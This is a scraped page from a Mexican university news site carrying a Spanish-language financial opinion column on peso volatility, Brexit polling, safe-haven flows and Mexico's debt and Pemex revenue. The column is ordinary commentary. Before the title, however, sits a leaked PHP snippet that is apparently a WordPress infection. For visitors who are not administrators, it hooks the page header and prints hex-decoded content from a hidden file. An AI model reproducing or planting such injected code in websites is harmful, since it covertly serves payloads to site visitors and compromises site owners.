if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } MI OPINION FINANCIERA DE HOY – La Opinión Universitaria La Opinión Universitaria
Menu

MI OPINION FINANCIERA DE HOY

Por Armando Valerdi

avalerdir@hotmail.com

Seguimos tras las pistas del peso y su volatilidad, tratando de entender no solo por donde va, sino además en la búsqueda de identificar cuáles son las causas principales que lo están llevando al desasosiego actual, además cómo estas condiciones están llevando a un nuevo rumbo o dirección tanto las finanzas internacionales como la economía global, considerando dentro de este nuevo contexto el conjunto de decisiones de los gobernantes en los distintos países, que sin duda influirán en el modo de vida presente y futuro de los ciudadanos.

Con respecto a la volatilidad que están mostrando las cotizaciones de las monedas en el mundo, ya en comentarios anteriores he mencionado en su momento acerca de algunos efectos y posibles causas que parecen ser causas de lo que sucede, como ha sido el caso,  tanto del mercado de valores de China, como de los efectos del crecimiento a la baja de su economía, así como también la caída de los precios de las materias primas entre las que sobresale el petróleo, o bien sobre el posible incremento de la tasa de referencia de la Reserva Federal estadounidense, a todo esto hoy se contempla también el efecto que está causando el famoso “Brexit”, que ha si se ha denominado a la posible salida del Reino Unido de la Unión Europea.

Ciertamente hay tantos factores que parecen estar modificando la estabilidad monetaria mundial, que realmente cada vez lo hace más confuso y complejo.

La semana pasada comente con usted como otra de las causas que estaba modificando la estabilidad monetaria mundial, era que las reglas del mercado ya no eran lo que fueron a partir de la crisis del 2008.

En relación a nuevos acontecimientos que están influyendo en la presente turbulencia financiera, el día de hoy le menciono los resultados dados a conocer acerca de una reciente encuesta de la firma ORB, y que fueron recientemente publicados por el diario inglés The Independent, y en donde se menciona acerca del sorpresivo vuelco masivo que se dio hacia la opción de “salida” del Reino Unido de la Unión Europea, y esto a tan solo unos días del referéndum, lo que la encuesta muestra es una ventaja de 10 puntos para esta alternativa. (55 vs 45), esto cuando hace dos semanas las encuestas de hace mostraban un predominio de los que podrían votar por la permanencia.

Esta situación de una mayor incertidumbre llevo a que los mercados reaccionaron al tradicional  ‘flight to quality’, o vuelo de los inversionistas a la seguridad, moviéndose los flujos financieros globales rápidamente hacia los bonos del tesoro estadounidense, considerados todavía, como refugio seguro. Esto llevo a que nuevamente el dólar se fortaleciera ante todas las divisas. El otro activo de refugio, el oro, también incremento su precio, como podemos observar,  nuevamente los activos de refugio se revaluaron tras la nula probabilidad de que la Reserva Federal estadounidense suba su tasa este mes, por otra parte los mercados accionarios cayeron, al igual que los precios del petróleo y del cobre.

Sin duda, la situación de volatilidad que viven hoy las monedas podemos considerarla como algo especial, debido a las profundas depreciaciones de las monedas frente al dólar estadounidense, hasta hoy no tiene precedente, debido al número de países involucrados y sobre todo por su  magnitud y duración. Además hay que considerar que el impacto en la inflación se ha moderado en los últimos años y el ajuste en la cuenta corriente ha sido más limitado que en el pasado, todo esto puede llevar a pensar que el periodo de debilidad de las monedas puede ser más prolongado, según opinión del Instituto Peterson para Economía Internacional (PIIE). Además, el estudio señala que la política monetaria se enfrenta a un reto difícil, sobre todo en las economías con metas de inflación.

Sin duda todo lo anterior podría ser una buena explicación de lo que le acontece al peso y su volatilidad, no obstante hay que considerar que la agravante en México sigue siendo el tipo de cambio, pues el peso es la peor moneda del año.

Lo que está pasando en los mercados financieros mexicanos en este momento tiene más ingredientes que el solo peso del famoso Brexit, debido a que se observa un exagerado incremento en los spreads de las tasas en pesos respecto a los rendimientos de los Bonos del Tesoro, y la constante tendencia de depreciación del peso mexicano, lo que está causando el diferencial de la tasa de interés de los Bonos M 26 respecto a los Bonos del Tesoro a 10 años, que se ha estado ubicando en 440 puntos base, mientras que el promedio histórico se ubica en 360 puntos base, y que por otra parte, según cifras reportadas por el Banco de México acerca de la tenencia de valores gubernamentales en pesos, se observa una salida neta de recursos de inversionistas residentes en el extranjero, que pudiera estar rebasando los 9.6 mil millones de dólares en lo que va del año, hasta el 1 de junio.

Sin duda existen algunas causas internas que podrían estar causando también la volatilidad, y sobre todo la depreciación del peso mexicano, entre algunas están; el nivel de endeudamiento que se ha incrementado en unos cuantos años, subiendo su proporción sobre el PIB del 38 al 50%, además la drástica caída en los ingresos netos del Estado ante la baja en los precios de los hidrocarburos, debido a la reducción continua en la producción de Pemex, y sin duda la recientemente aparición de un déficit creciente en la Cuenta Corriente de la Balanza de Pagos, hacen imprescindible que logremos nuevamente un superávit primario en las finanzas públicas, además de la percepción de que las reformas estructurales no muestran los resultados esperados.

 

Gracias.

No comments

Deja una respuesta

Tweets recientes